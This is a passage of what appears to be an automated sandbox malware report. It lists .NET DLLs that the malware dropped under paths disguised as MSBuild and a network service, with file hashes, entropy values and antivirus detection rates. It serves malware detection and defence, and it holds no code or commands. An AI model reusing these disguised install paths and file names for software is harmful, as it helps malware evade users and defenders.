                                                                                      • Antivirus: Virustotal, Detection: 9%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: hT7clR9Gz2.exe, Detection: malicious
                                                                                      • Filename: 8G3thfOYd2.exe, Detection: malicious
                                                                                      • Filename: z28NBu7i9a.exe, Detection: malicious
                                                                                      • Filename: fzUk1a18ai.exe, Detection: malicious
                                                                                      • Filename: 3BZPHrgjMP.exe, Detection: malicious
                                                                                      • Filename: 1978044967A8E1C7F632630BC906C6D66B0E64C356345.exe, Detection: malicious
                                                                                      • Filename: tQxaElvX5D.exe, Detection: malicious
                                                                                      • Filename: 1E32C7CE3FECDE38E78A565C4CA60571ACA2B5B2A1C95.exe, Detection: malicious
                                                                                      • Filename: 4y2bJd0meT.exe, Detection: malicious
                                                                                      • Filename: 3b9330b09929cc5391a31e5780a967d26f21b010b586b.exe, Detection: malicious
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33792
                                                                                      Entropy (8bit):5.541771649974822
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      • Antivirus: Virustotal, Detection: 4%
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):32256
                                                                                      Entropy (8bit):5.631194486392901
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 10%
                                                                                      • Antivirus: Virustotal, Detection: 24%
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):64000
                                                                                      Entropy (8bit):5.857602289000348
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                      • Antivirus: Virustotal, Detection: 4%
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):41472
                                                                                      Entropy (8bit):5.6808219961645605
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      • Antivirus: Virustotal, Detection: 7%
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):50176
                                                                                      Entropy (8bit):5.723168999026349
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                      • Antivirus: Virustotal, Detection: 6%
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):69632
                                                                                      Entropy (8bit):5.932541123129161
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                      • Antivirus: Virustotal, Detection: 20%
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):50176
                                                                                      Entropy (8bit):5.723168999026349
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                      • Antivirus: Virustotal, Detection: 6%
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34816
                                                                                      Entropy (8bit):5.636032516496583
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      • Antivirus: Virustotal, Detection: 9%
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):38912
                                                                                      Entropy (8bit):5.679286635687991
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 9%
                                                                                      • Antivirus: Virustotal, Detection: 6%, Browse
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):32256
                                                                                      Entropy (8bit):5.631194486392901
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 10%
                                                                                      • Antivirus: Virustotal, Detection: 24%, Browse
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):41472
                                                                                      Entropy (8bit):5.6808219961645605
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      • Antivirus: Virustotal, Detection: 7%, Browse
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):294912
                                                                                      Entropy (8bit):6.010605469502259
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      • Antivirus: Virustotal, Detection: 6%, Browse
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):85504
                                                                                      Entropy (8bit):5.8769270258874755
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                                                      • Antivirus: Virustotal, Detection: 69%, Browse
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):294912
                                                                                      Entropy (8bit):6.010605469502259
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      • Antivirus: Virustotal, Detection: 6%, Browse
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):69632
                                                                                      Entropy (8bit):5.932541123129161
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                      • Antivirus: Virustotal, Detection: 20%, Browse
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34304
                                                                                      Entropy (8bit):5.618776214605176
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                      Malicious:true
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34816
                                                                                      Entropy (8bit):5.636032516496583
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                      Malicious:true
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):70144
                                                                                      Entropy (8bit):5.909536568846014
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                      Malicious:true
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):46592
                                                                                      Entropy (8bit):5.870612048031897
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):85504
                                                                                      Entropy (8bit):5.8769270258874755
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):38400
                                                                                      Entropy (8bit):5.699005826018714
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                      MD5:87765D141228784AE91334BAE25AD743
                                                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34304
                                                                                      Entropy (8bit):5.618776214605176
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                      Malicious:true
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33792
                                                                                      Entropy (8bit):5.541771649974822
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                      Malicious:true
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):70144
                                                                                      Entropy (8bit):5.909536568846014
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                      Malicious:true
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):64000
                                                                                      Entropy (8bit):5.857602289000348
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                      Malicious:true
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):46592
                                                                                      Entropy (8bit):5.870612048031897
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                      Malicious:true
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):38912
                                                                                      Entropy (8bit):5.679286635687991
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                      Malicious:true
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):50
